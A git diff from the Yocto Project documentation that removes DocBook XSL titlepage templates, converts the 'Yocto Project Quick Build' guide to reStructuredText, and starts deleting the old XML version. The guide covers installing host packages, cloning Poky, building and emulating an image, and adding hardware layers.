-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="index.titlepage.before.verso"/>
-      <xsl:call-template name="index.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="index.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="index.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="index.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="index.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="index.titlepage.recto.style">
-<xsl:apply-templates select="." mode="index.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.recto">
-  <div xsl:use-attribute-sets="setindex.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::setindex[1]"/>
-</xsl:call-template></div>
-  <xsl:choose>
-    <xsl:when test="setindexinfo/subtitle">
-      <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="setindexinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="setindex.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="setindex.titlepage.before.recto"/>
-      <xsl:call-template name="setindex.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="setindex.titlepage.before.verso"/>
-      <xsl:call-template name="setindex.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="setindex.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="setindex.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="setindex.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="setindex.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="setindex.titlepage.recto.style">
-<xsl:apply-templates select="." mode="setindex.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="sidebarinfo/title">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="sidebarinfo/title"/>
-    </xsl:when>
-    <xsl:when test="docinfo/title">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="docinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="sidebarinfo/subtitle">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="sidebarinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="sidebar.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sidebar.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="sidebar.titlepage.before.recto"/>
-      <xsl:call-template name="sidebar.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="sidebar.titlepage.before.verso"/>
-      <xsl:call-template name="sidebar.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="sidebar.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sidebar.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sidebar.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sidebar.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sidebar.titlepage.recto.style">
-<xsl:call-template name="formal.object.heading">
-<xsl:with-param name="object" select="ancestor-or-self::sidebar[1]"/>
-</xsl:call-template>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sidebar.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sidebar.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sidebar.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-</xsl:stylesheet>
-
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
new file mode 100644
index 0000000000..6a44511af2
--- /dev/null
+++ b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst
@@ -0,0 +1,421 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=========================
+Yocto Project Quick Build
+=========================
+
+Welcome!
+========
+
+This short document steps you through the process for a typical
+image build using the Yocto Project. The document also introduces how to
+configure a build for specific hardware. You will use Yocto Project to
+build a reference embedded OS called Poky.
+
+.. note::
+
+   -  The examples in this paper assume you are using a native Linux
+      system running a recent Ubuntu Linux distribution. If the machine
+      you want to use Yocto Project on to build an image
+      (:term:`Build Host`) is not
+      a native Linux system, you can still perform these steps by using
+      CROss PlatformS (CROPS) and setting up a Poky container. See the
+      :ref:`dev-manual/dev-manual-start:setting up to use cross platforms (crops)`
+      section
+      in the Yocto Project Development Tasks Manual for more
+      information.
+
+   -  You may use Windows Subsystem For Linux v2 to set up a build host
+      using Windows 10.
+
+      .. note::
+
+         The Yocto Project is not compatible with WSLv1, it is
+         compatible but not officially supported nor validated with
+         WSLv2, if you still decide to use WSL please upgrade to WSLv2.
+
+      See the :ref:`dev-manual/dev-manual-start:setting up to use windows
+      subsystem for linux (wslv2)` section in the Yocto Project Development
+      Tasks Manual for more information.
+
+If you want more conceptual or background information on the Yocto
+Project, see the :doc:`../overview-manual/overview-manual`.
+
+Compatible Linux Distribution
+=============================
+
+Make sure your :term:`Build Host` meets the
+following requirements:
+
+-  50 Gbytes of free disk space
+
+-  Runs a supported Linux distribution (i.e. recent releases of Fedora,
+   openSUSE, CentOS, Debian, or Ubuntu). For a list of Linux
+   distributions that support the Yocto Project, see the
+   :ref:`ref-manual/ref-system-requirements:supported linux distributions`
+   section in the Yocto Project Reference Manual. For detailed
+   information on preparing your build host, see the
+   :ref:`dev-manual/dev-manual-start:preparing the build host`
+   section in the Yocto Project Development Tasks Manual.
+
+-
+
+   -  Git 1.8.3.1 or greater
+   -  tar 1.28 or greater
+   -  Python 3.5.0 or greater.
+   -  gcc 5.0 or greater.
+
+If your build host does not meet any of these three listed version
+requirements, you can take steps to prepare the system so that you
+can still use the Yocto Project. See the
+:ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`
+section in the Yocto Project Reference Manual for information.
+
+Build Host Packages
+===================
+
+You must install essential host packages on your build host. The
+following command installs the host packages based on an Ubuntu
+distribution:
+
+.. code-block:: shell
+
+  $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
+
+.. note::
+
+   For host package requirements on all supported Linux distributions,
+   see the :ref:`ref-manual/ref-system-requirements:required packages for the build host`
+   section in the Yocto Project Reference Manual.
+
+Use Git to Clone Poky
+=====================
+
+Once you complete the setup instructions for your machine, you need to
+get a copy of the Poky repository on your build host. Use the following
+commands to clone the Poky repository.
+
+.. code-block:: shell
+
+   $ git clone git://git.yoctoproject.org/poky
+   Cloning into 'poky'...
+   remote: Counting
+   objects: 432160, done. remote: Compressing objects: 100%
+   (102056/102056), done. remote: Total 432160 (delta 323116), reused
+   432037 (delta 323000) Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
+   Resolving deltas: 100% (323116/323116), done.
+   Checking connectivity... done.
+
+Move to the ``poky`` directory and take a look at the tags:
+
+.. code-block:: shell
+
+   $ cd poky
+   $ git fetch --tags
+   $ git tag
+   1.1_M1.final
+   1.1_M1.rc1
+   1.1_M1.rc2
+   1.1_M2.final
+   1.1_M2.rc1
+   .
+   .
+   .
+   yocto-2.5
+   yocto-2.5.1
+   yocto-2.5.2
+   yocto-2.6
+   yocto-2.6.1
+   yocto-2.6.2
+   yocto-2.7
+   yocto_1.5_M5.rc8
+
+For this example, check out the branch based on the
+``&DISTRO_REL_TAG;`` release:
+
+.. code-block:: shell
+
+   $ git checkout tags/&DISTRO_REL_TAG; -b my-&DISTRO_REL_TAG;
+   Switched to a new branch 'my-&DISTRO_REL_TAG;'
+
+The previous Git checkout command creates a local branch named
+``my-&DISTRO_REL_TAG;``. The files available to you in that branch exactly
+match the repository's files in the ``&DISTRO_NAME_NO_CAP;`` development
+branch at the time of the Yocto Project &DISTRO_REL_TAG; release.
+
+For more options and information about accessing Yocto Project related
+repositories, see the
+:ref:`dev-manual/dev-manual-start:locating yocto project source files`
+section in the Yocto Project Development Tasks Manual.
+
+Building Your Image
+===================
+
+Use the following steps to build your image. The build process creates
+an entire Linux distribution, including the toolchain, from source.
+
+.. note::
+
+   -  If you are working behind a firewall and your build host is not
+      set up for proxies, you could encounter problems with the build
+      process when fetching source code (e.g. fetcher failures or Git
+      failures).
+
+   -  If you do not know your proxy settings, consult your local network
+      infrastructure resources and get that information. A good starting
+      point could also be to check your web browser settings. Finally,
+      you can find more information on the
+      ":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+      page of the Yocto Project Wiki.
+
+#. **Initialize the Build Environment:** From within the ``poky``
+   directory, run the :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\``
+   environment
+   setup script to define Yocto Project's build environment on your
+   build host.
+
+   .. code-block:: shell
+
+      $ cd ~/poky
+      $ source oe-init-build-env
+      You had no conf/local.conf file. This configuration file has therefore been
+      created for you with some default values. You may wish to edit it to, for
+      example, select a different MACHINE (target hardware). See conf/local.conf
+      for more information as common configuration options are commented.
+
+      You had no conf/bblayers.conf file. This configuration file has therefore
+      been created for you with some default values. To add additional metadata
+      layers into your configuration please add entries to conf/bblayers.conf.
+
+      The Yocto Project has extensive documentation about OE including a reference
+      manual which can be found at:
+          http://yoctoproject.org/documentation
+
+      For more information about OpenEmbedded see their website:
+          http://www.openembedded.org/
+
+      ### Shell environment set up for builds. ###
+
+      You can now run 'bitbake <target>'
+
+      Common targets are:
+          core-image-minimal
+          core-image-sato
+          meta-toolchain
+          meta-ide-support
+
+      You can also run generated qemu images with a command like 'runqemu qemux86-64'
+
+   Among other things, the script creates the :term:`Build Directory`, which is
+   ``build`` in this case and is located in the :term:`Source Directory`.  After
+   the script runs, your current working directory is set to the Build
+   Directory. Later, when the build completes, the Build Directory contains all the
+   files created during the build.
+
+#. **Examine Your Local Configuration File:** When you set up the build
+   environment, a local configuration file named ``local.conf`` becomes
+   available in a ``conf`` subdirectory of the Build Directory. For this
+   example, the defaults are set to build for a ``qemux86`` target,
+   which is suitable for emulation. The package manager used is set to
+   the RPM package manager.
+
+   .. tip::
+
+      You can significantly speed up your build and guard against fetcher
+      failures by using mirrors. To use mirrors, add this line to your
+      ``local.conf`` file in the :term:`Build Directory`: ::
+
+         SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
+
+#. **Start the Build:** Continue with the following command to build an OS
+   image for the target, which is ``core-image-sato`` in this example:
+
+   .. code-block:: shell
+
+      $ bitbake core-image-sato
+
+   For information on using the ``bitbake`` command, see the
+   :ref:`usingpoky-components-bitbake` section in the Yocto Project Overview and
+   Concepts Manual, or see the ":ref:`BitBake Command
+   <bitbake:bitbake-user-manual-command>`" section in the BitBake User Manual.
+
+#. **Simulate Your Image Using QEMU:** Once this particular image is
+   built, you can start QEMU, which is a Quick EMUlator that ships with
+   the Yocto Project:
+
+   .. code-block:: shell
+
+      $ runqemu qemux86-64
+
+   If you want to learn more about running QEMU, see the
+   :ref:`dev-manual/dev-manual-qemu:using the quick emulator (qemu)` chapter in
+   the Yocto Project Development Tasks Manual.
+
+#. **Exit QEMU:** Exit QEMU by either clicking on the shutdown icon or by typing
+   ``Ctrl-C`` in the QEMU transcript window from which you evoked QEMU.
+
+Customizing Your Build for Specific Hardware
+============================================
+
+So far, all you have done is quickly built an image suitable for
+emulation only. This section shows you how to customize your build for
+specific hardware by adding a hardware layer into the Yocto Project
+development environment.
+
+In general, layers are repositories that contain related sets of
+instructions and configurations that tell the Yocto Project what to do.
+Isolating related metadata into functionally specific layers facilitates
+modular development and makes it easier to reuse the layer metadata.
+
+.. note::
+
+   By convention, layer names start with the string "meta-".
+
+Follow these steps to add a hardware layer:
+
+#. **Find a Layer:** Lots of hardware layers exist. The Yocto Project
+   :yocto_git:`Source Repositories <>` has many hardware layers.
+   This example adds the
+   `meta-altera <https://github.com/kraj/meta-altera>`__ hardware layer.
+
+#. **Clone the Layer:** Use Git to make a local copy of the layer on your
+   machine. You can put the copy in the top level of the copy of the
+   Poky repository created earlier:
+
+   .. code-block:: shell
+
+      $ cd ~/poky
+      $ git clone https://github.com/kraj/meta-altera.git
+      Cloning into 'meta-altera'...
+      remote: Counting objects: 25170, done.
+      remote: Compressing objects: 100% (350/350), done.
+      remote: Total 25170 (delta 645), reused 719 (delta 538), pack-reused 24219
+      Receiving objects: 100% (25170/25170), 41.02 MiB | 1.64 MiB/s, done.
+      Resolving deltas: 100% (13385/13385), done.
+      Checking connectivity... done.
+
+   The hardware layer now exists
+   with other layers inside the Poky reference repository on your build
+   host as ``meta-altera`` and contains all the metadata needed to
+   support hardware from Altera, which is owned by Intel.
+
+   .. note::
+
+      It is recommended for layers to have a branch per Yocto Project release.
+      Please make sure to checkout the layer branch supporting the Yocto Project
+      release you're using.
+
+#. **Change the Configuration to Build for a Specific Machine:** The
+   :term:`MACHINE` variable in the
+   ``local.conf`` file specifies the machine for the build. For this
+   example, set the ``MACHINE`` variable to ``cyclone5``. These
+   configurations are used:
+   https://github.com/kraj/meta-altera/blob/master/conf/machine/cyclone5.conf.
+
+   .. note::
+
+      See the "Examine Your Local Configuration File" step earlier for more
+      information on configuring the build.
+
+#. **Add Your Layer to the Layer Configuration File:** Before you can use
+   a layer during a build, you must add it to your ``bblayers.conf``
+   file, which is found in the
+   :term:`Build Directory` ``conf``
+   directory.
+
+   Use the ``bitbake-layers add-layer`` command to add the layer to the
+   configuration file:
+
+   .. code-block:: shell
+
+      $ cd ~/poky/build
+      $ bitbake-layers add-layer ../meta-altera
+      NOTE: Starting bitbake server...
+      Parsing recipes: 100% |##################################################################| Time: 0:00:32
+      Parsing of 918 .bb files complete (0 cached, 918 parsed). 1401 targets,
+      123 skipped, 0 masked, 0 errors.
+
+   You can find
+   more information on adding layers in the
+   :ref:`dev-manual/dev-manual-common-tasks:adding a layer using the \`\`bitbake-layers\`\` script`
+   section.
+
+Completing these steps has added the ``meta-altera`` layer to your Yocto
+Project development environment and configured it to build for the
+``cyclone5`` machine.
+
+.. note::
+
+   The previous steps are for demonstration purposes only. If you were
+   to attempt to build an image for the ``cyclone5`` machine, you should
+   read the Altera ``README``.
+
+Creating Your Own General Layer
+===============================
+
+Maybe you have an application or specific set of behaviors you need to
+isolate. You can create your own general layer using the
+``bitbake-layers create-layer`` command. The tool automates layer
+creation by setting up a subdirectory with a ``layer.conf``
+configuration file, a ``recipes-example`` subdirectory that contains an
+``example.bb`` recipe, a licensing file, and a ``README``.
+
+The following commands run the tool to create a layer named
+``meta-mylayer`` in the ``poky`` directory:
+
+.. code-block:: shell
+
+   $ cd ~/poky
+   $ bitbake-layers create-layer meta-mylayer
+   NOTE: Starting bitbake server...
+   Add your new layer with 'bitbake-layers add-layer meta-mylayer'
+
+For more information
+on layers and how to create them, see the
+:ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`
+section in the Yocto Project Development Tasks Manual.
+
+Where To Go Next
+================
+
+Now that you have experienced using the Yocto Project, you might be
+asking yourself "What now?". The Yocto Project has many sources of
+information including the website, wiki pages, and user manuals:
+
+-  **Website:** The :yocto_home:`Yocto Project Website <>` provides
+   background information, the latest builds, breaking news, full
+   development documentation, and access to a rich Yocto Project
+   Development Community into which you can tap.
+
+-  **Developer Screencast:** The `Getting Started with the Yocto Project -
+   New Developer Screencast Tutorial <http://vimeo.com/36450321>`__
+   provides a 30-minute video created for users unfamiliar with the
+   Yocto Project but familiar with Linux build hosts. While this
+   screencast is somewhat dated, the introductory and fundamental
+   concepts are useful for the beginner.
+
+-  **Yocto Project Overview and Concepts Manual:** The
+   :doc:`../overview-manual/overview-manual` is a great
+   place to start to learn about the Yocto Project. This manual
+   introduces you to the Yocto Project and its development environment.
+   The manual also provides conceptual information for various aspects
+   of the Yocto Project.
+
+-  **Yocto Project Wiki:** The :yocto_wiki:`Yocto Project Wiki <>`
+   provides additional information on where to go next when ramping up
+   with the Yocto Project, release information, project planning, and QA
+   information.
+
+-  **Yocto Project Mailing Lists:** Related mailing lists provide a forum
+   for discussion, patch submission and announcements. Several mailing
+   lists exist and are grouped according to areas of concern. See the
+   :ref:`ref-manual/resources:mailing lists`
+   section in the Yocto Project Reference Manual for a complete list of
+   Yocto Project mailing lists.
+
+-  **Comprehensive List of Links and Other Documentation:** The
+   :ref:`ref-manual/resources:links and related documentation`
+   section in the Yocto Project Reference Manual provides a
+   comprehensive list of all related links and other user documentation.
+
+.. include:: /boilerplate.rst
diff --git a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.xml b/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.xml
deleted file mode 100644
index 3c83afd46b..0000000000
--- a/documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.xml
+++ /dev/null
@@ -1,576 +0,0 @@
-<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<article id='brief-yocto-project-qs-intro'>
-    <articleinfo>
-        <title>Yocto Project Quick Build</title>
-
-        <copyright>
-            <year>&COPYRIGHT_YEAR;</year>
-            <holder>Linux Foundation</holder>
-        </copyright>
-
-        <legalnotice>
-            <para>
-                Permission is granted to copy, distribute and/or modify this document under
-                the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-            </para>
-        </legalnotice>
-
-
-        <abstract>
-            <imagedata fileref="figures/yocto-project-transp.png"
-                        width="6in" depth="1in"
-                        align="right" scale="25" />
-        </abstract>
-    </articleinfo>
-
-    <section id='brief-welcome'>
-        <title>Welcome!</title>
-
-        <para>
-            Welcome!
-            This short document steps you through the process for a typical
-            image build using the Yocto Project.
-            The document also introduces how to configure a build for specific
-            hardware.
-            You will use Yocto Project to build a reference embedded OS
-            called Poky.
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        The examples in this paper assume you are using a
-                        native Linux system running a recent Ubuntu Linux
-                        distribution.
-                        If the machine you want to use Yocto Project on to
-                        build an image
-                        (<ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>)
-                        is not a native Linux system, you can
-                        still perform these steps by using CROss PlatformS
-                        (CROPS) and setting up a Poky container.
-                        See the
-                        <ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-crops'>Setting Up to Use CROss PlatformS (CROPS)</ulink>"
-                        section in the Yocto Project Development Tasks Manual for more
-                        information.
-                        </para></listitem>
-                    <listitem><para>
-                        You may use Windows Subsystem For Linux v2 to set up a build
-                        host using Windows 10.
-                        <note>
-                          The Yocto Project is not compatible with WSLv1, it is
-                          compatible but not officially supported nor validated
-                          with WSLv2, if you still decide to use WSL please upgrade
-                          to WSLv2.
-                        </note>
-                        See the
-                        <ulink url='&YOCTO_DOCS_DEV_URL;#setting-up-to-use-wsl'>Setting Up to Use Windows Subsystem For Linux</ulink>"
-                        section in the Yocto Project Development Tasks Manual for more
-                        information.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            If you want more conceptual or background information on the
-            Yocto Project, see the
-            <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>.
-        </para>
-    </section>
-
-    <section id='brief-compatible-distro'>
-        <title>Compatible Linux Distribution</title>
-
-        <para>
-            Make sure your
-            <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
-            meets the following requirements:
-            <itemizedlist>
-                <listitem><para>
-                    50 Gbytes of free disk space
-                    </para></listitem>
-                <listitem><para>
-                    Runs a supported Linux distribution (i.e. recent releases of
-                    Fedora, openSUSE, CentOS, Debian, or Ubuntu). For a list of
-                    Linux distributions that support the Yocto Project, see the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#detailed-supported-distros'>Supported Linux Distributions</ulink>"
-                    section in the Yocto Project Reference Manual.
-                    For detailed information on preparing your build host, see
-                    the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-                <listitem><para>
-                    <itemizedlist>
-                        <listitem><para>
-                            Git 1.8.3.1 or greater
-                            </para></listitem>
-                        <listitem><para>
-                            tar 1.28 or greater
-                            </para></listitem>
-                        <listitem><para>
-                            Python 3.5.0 or greater.
-                        </para></listitem>
-                        <listitem><para>
-                            gcc 5.0 or greater.
-                        </para></listitem>
-                    </itemizedlist>
-                    If your build host does not meet any of these three listed
-                    version requirements, you can take steps to prepare the
-                    system so that you can still use the Yocto Project.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</ulink>"
-                    section in the Yocto Project Reference Manual for information.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='brief-build-system-packages'>
-        <title>Build Host Packages</title>
-
-        <para>
-            You must install essential host packages on your
-            build host.
-            The following command installs the host packages based on an
-            Ubuntu distribution:
-            <note>
-                For host package requirements on all supported Linux
-                distributions, see the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-build-host'>Required Packages for the Build Host</ulink>"
-                section in the Yocto Project Reference Manual.
-            </note>
-            <literallayout class='monospaced'>
-     $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='brief-use-git-to-clone-poky'>
-        <title>Use Git to Clone Poky</title>
-
-        <para>
-            Once you complete the setup instructions for your machine,
-            you need to get a copy of the Poky repository on your build
-            host.
-            Use the following commands to clone the Poky
-            repository.
-            <literallayout class='monospaced'>
-     $ git clone git://git.yoctoproject.org/poky
-     Cloning into 'poky'...
-     remote: Counting objects: 432160, done.
-     remote: Compressing objects: 100% (102056/102056), done.
-     remote: Total 432160 (delta 323116), reused 432037 (delta 323000)
-     Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
-     Resolving deltas: 100% (323116/323116), done.
-     Checking connectivity... done.
-            </literallayout>
-            Move to the <filename>poky</filename> directory and take a look
-            at the tags:
-            <literallayout class='monospaced'>
-     $ cd poky
-     $ git fetch --tags
-     $ git tag
-     1.1_M1.final
-     1.1_M1.rc1
-     1.1_M1.rc2
-     1.1_M2.final
-     1.1_M2.rc1
-        .
-        .
-        .
-     yocto-2.5
-     yocto-2.5.1
-     yocto-2.5.2
-     yocto-2.6
-     yocto-2.6.1
-     yocto-2.6.2
-     yocto-2.7
-     yocto_1.5_M5.rc8
-            </literallayout>
-            For this example, check out the branch based on the
-            &DISTRO_REL_TAG; release:
-            <literallayout class='monospaced'>
-     $ git checkout tags/&DISTRO_REL_TAG; -b my-&DISTRO_REL_TAG;
-     Switched to a new branch 'my-&DISTRO_REL_TAG;'
-            </literallayout>
-            The previous Git checkout command creates a local branch
-            named my-&DISTRO_REL_TAG;. The files available to you in that
-            branch exactly match the repository's files in the
-            "&DISTRO_NAME_NO_CAP;" development branch at the time of the
-            Yocto Project &DISTRO_REL_TAG; release.
-        </para>
-
-        <para>
-            For more options and information about accessing Yocto
